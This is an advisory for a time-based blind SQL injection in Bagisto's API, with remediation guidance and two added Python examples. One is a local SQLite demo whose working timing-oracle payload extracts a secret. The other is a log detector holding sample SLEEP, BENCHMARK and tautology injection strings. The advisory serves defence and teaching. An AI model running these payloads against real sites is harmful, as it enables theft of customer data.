CVE-2026-21447

Bagisto · Bagisto Multiple Products

A high-severity vulnerability has been identified in the Bagisto eCommerce platform, which could allow an unauthenticated remote attacker to access and exfiltrate sensitive database information.

Executive summary

The flaw is a time-based blind SQL injection in a publicly accessible API component of the Bagisto eCommerce platform and can be exploited by an unauthenticated remote attacker to read sensitive database information. Successful exploitation could lead to the theft of customer personal data, order history, and other critical business information, posing a significant risk to data confidentiality and organizational reputation.

Vulnerability

The vulnerability is a time-based blind SQL injection flaw in a publicly accessible component of the application's API. User-supplied input reaches a database query without adequate sanitization, so an attacker can send specially crafted HTTP requests to the affected endpoint and alter the structure of the query. The injected SQL makes the database perform a deliberately time-consuming operation only when a condition chosen by the attacker is true, so nothing about the data appears in the response body (hence "blind"); the attacker instead infers database contents one character at a time from the server's response time.
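The following is an added illustration of the flaw class described above, not Bagisto's code and not tied to any specific Bagisto endpoint. An in-memory SQLite table stands in for the application's database, and a Python sleep() is registered as a SQL function to play the role of MySQL's SLEEP(). The vulnerable lookup splices user input into the query text; the fixed lookup binds it as a parameter. The timing oracle recovers a constructed sample secret from the vulnerable function and fails against the fixed one. All table names, column names and the DELAY value are assumptions made for the example.

```python
"""Time-based blind SQL injection: vulnerable and fixed query construction.

Added illustration, not Bagisto's code. SQLite stands in for the real
database; sleep() is registered so a conditional delay can be shown.
"""
import sqlite3
import time

DELAY = 0.2            # seconds the injected condition sleeps when true (assumed)
THRESHOLD = DELAY / 2  # response time above this counts as "delayed"


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one to play the role of MySQL's SLEEP().
    conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, sku TEXT)")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "SKU-1"), (2, "SKU-2")])
    # Constructed sample secret that the timing oracle will try to read.
    conn.execute("INSERT INTO customers VALUES (1, 'hunter2')")
    return conn


def vulnerable_lookup(conn, sku):
    # The bug: input becomes part of the SQL text, so a quote ends the literal.
    sql = f"SELECT id FROM products WHERE sku = '{sku}'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, sku):
    # The fix: a bound parameter is always data and can never change query structure.
    sql = "SELECT id FROM products WHERE sku = ?"
    return [row[0] for row in conn.execute(sql, (sku,))]


def guess_char(conn, lookup, position, char):
    """Return True if the guessed character of the secret is correct.

    The payload closes the string literal, appends a subquery that sleeps only
    when the guess is right, and comments out the rest of the original query.
    The response body never contains the secret; only the elapsed time leaks it.
    """
    payload = (
        f"x' OR (SELECT CASE WHEN substr(password,{position},1)='{char}' "
        f"THEN sleep({DELAY}) ELSE 0 END FROM customers WHERE id=1)--"
    )
    start = time.perf_counter()
    lookup(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def extract_secret(conn, lookup, length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Character-by-character inference from response time."""
    secret = ""
    for position in range(1, length + 1):
        for char in alphabet:
            if guess_char(conn, lookup, position, char):
                secret += char
                break
        else:
            return secret  # no guess produced a delay: the oracle is not available
    return secret


if __name__ == "__main__":
    db = make_db()
    print("tautology, vulnerable:", vulnerable_lookup(db, "' OR 1=1 --"))
    print("tautology, fixed:     ", safe_lookup(db, "' OR 1=1 --"))
    print("extracted via timing: ", extract_secret(db, vulnerable_lookup, 7))
    print("same attack vs fixed: ", repr(extract_secret(db, safe_lookup, 7)))
```

Against the fixed function the same payload is simply an unknown SKU: no rows, no delay, and the oracle returns an empty string. Parameter binding, not keyword filtering, is what removes the flaw class.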

Business impact

This vulnerability is rated as High severity with a CVSS score of 7.1. Exploitation could lead to a significant data breach, exposing sensitive customer information (e.g., names, addresses, contact details) and confidential business data (e.g., sales records, product information). Such an incident could result in severe reputational damage, loss of customer trust, regulatory fines under data protection laws like GDPR, and potential financial losses associated with incident response and recovery.

Remediation

Immediate Action: Apply the security updates provided by Bagisto across all affected instances immediately. Prioritize patching for internet-facing production environments. After patching, review web server and database access logs for any signs of exploitation attempts that may have occurred prior to the update.

Proactive Monitoring: Security teams should actively monitor web application firewall (WAF), web server, and database logs for anomalies. Look for requests containing SQL keywords (e.g., SELECT, UNION, SLEEP, BENCHMARK) or other patterns indicative of SQL injection, and decode URL-encoded parameters before matching, since payloads are normally percent-encoded in transit and in access logs. Monitor for unusual response times from the application, which could indicate time-based exploitation attempts; a run of slow responses to the same endpoint from one source is a stronger signal than a single slow request.
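As an added example of the monitoring described above (not part of the advisory), the following script runs the two checks over access-log lines: decoded request parameters are matched against injection indicators, including the delay functions named above, and response times are compared with a threshold. The log lines are constructed for the example, in Nginx combined format with the request time appended as a final field; that log_format, the path /api/v1/products and the SLOW_SECONDS threshold are assumptions.

```python
"""Detection pass over web server access logs for SQL injection indicators
and abnormally slow responses. Added example, not part of the advisory.
"""
import re
from urllib.parse import unquote_plus

# Combined log format with $request_time appended (assumed log_format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

# Injection indicators, matched case-insensitively against the decoded URL.
# "time-delay" covers the MySQL, PostgreSQL and MSSQL delay primitives.
SQLI_PATTERNS = {
    "time-delay": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "union-select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "tautology": re.compile(r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+", re.I),
    "comment-terminator": re.compile(r"--\s*$|/\*"),
}
SLOW_SECONDS = 5.0  # assumed threshold; tune to the endpoint's normal latency

# Constructed sample log: one legitimate client and one probing the search API.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2026:10:15:01 +0000] "GET /api/v1/products?search=shirt HTTP/1.1" 200 1532 "-" "Mozilla/5.0" 0.041
198.51.100.23 - - [12/Mar/2026:10:15:09 +0000] "GET /api/v1/products?search=shirt%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 812 "-" "python-requests/2.31" 5.013
198.51.100.23 - - [12/Mar/2026:10:15:10 +0000] "GET /api/v1/products?search=shirt%27%20OR%201%3D1-- HTTP/1.1" 200 9120 "-" "python-requests/2.31" 0.052
203.0.113.9 - - [12/Mar/2026:10:16:40 +0000] "POST /api/v1/customer/login HTTP/1.1" 200 310 "-" "Mozilla/5.0" 0.120
198.51.100.23 - - [12/Mar/2026:10:17:02 +0000] "GET /api/v1/products?search=shirt%27%20AND%20BENCHMARK(5000000%2CSHA1(1))--%20 HTTP/1.1" 200 812 "-" "python-requests/2.31" 6.402
203.0.113.7 - - [12/Mar/2026:10:18:15 +0000] "GET /api/v1/reports/export HTTP/1.1" 200 88120 "-" "Mozilla/5.0" 7.210
"""


def parse_line(line):
    """Parse one access-log line; returns None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    # Decode twice so double-encoded payloads are inspected in the clear.
    rec["decoded"] = unquote_plus(unquote_plus(rec["path"]))
    return rec


def classify(rec):
    """Return the list of indicators that fire for one parsed request."""
    reasons = [name for name, rx in SQLI_PATTERNS.items() if rx.search(rec["decoded"])]
    if rec["rt"] >= SLOW_SECONDS:
        reasons.append("slow-response")
    return reasons


def analyze(lines):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["decoded"],
                             "rt": rec["rt"], "reasons": reasons})
    return findings


def sqli_sources(findings):
    """Count findings per source IP that carry an injection indicator.

    A slow response on its own is not attributed to an attacker: legitimate
    heavy endpoints (exports, reports) are slow too.
    """
    counts = {}
    for f in findings:
        if any(r != "slow-response" for r in f["reasons"]):
            counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"{f['ts']} {f['ip']} {f['rt']:.3f}s {', '.join(f['reasons'])}  {f['path']}")
    print("injection sources:", sqli_sources(results))
```

In the sample, the export request is flagged for slowness alone and is not counted as an injection source, while the probing client is identified by its parameters whether or not the delay succeeded. Timing is corroboration; the decoded parameters are the evidence.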

Compensating Controls: If immediate patching is not feasible, place a Web Application Firewall (WAF) with strict SQL injection rules in front of the application. Treat this as a stopgap rather than a fix: signature-based rules reduce exposure but can be evaded with encoded or reworded payloads, so the patch remains required. Restrict access to the vulnerable application component if it is not essential for public operation, though this may impact functionality.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high severity (CVSS 7.1) of this vulnerability and its potential impact on a critical eCommerce platform, we recommend treating this as a high-priority issue. Although not currently listed on the CISA KEV catalog, the risk of a data breach is substantial. Organizations using affected Bagisto products should apply the vendor-provided patches immediately, adhering to their critical vulnerability patching timelines (e.g., within 7-14 days).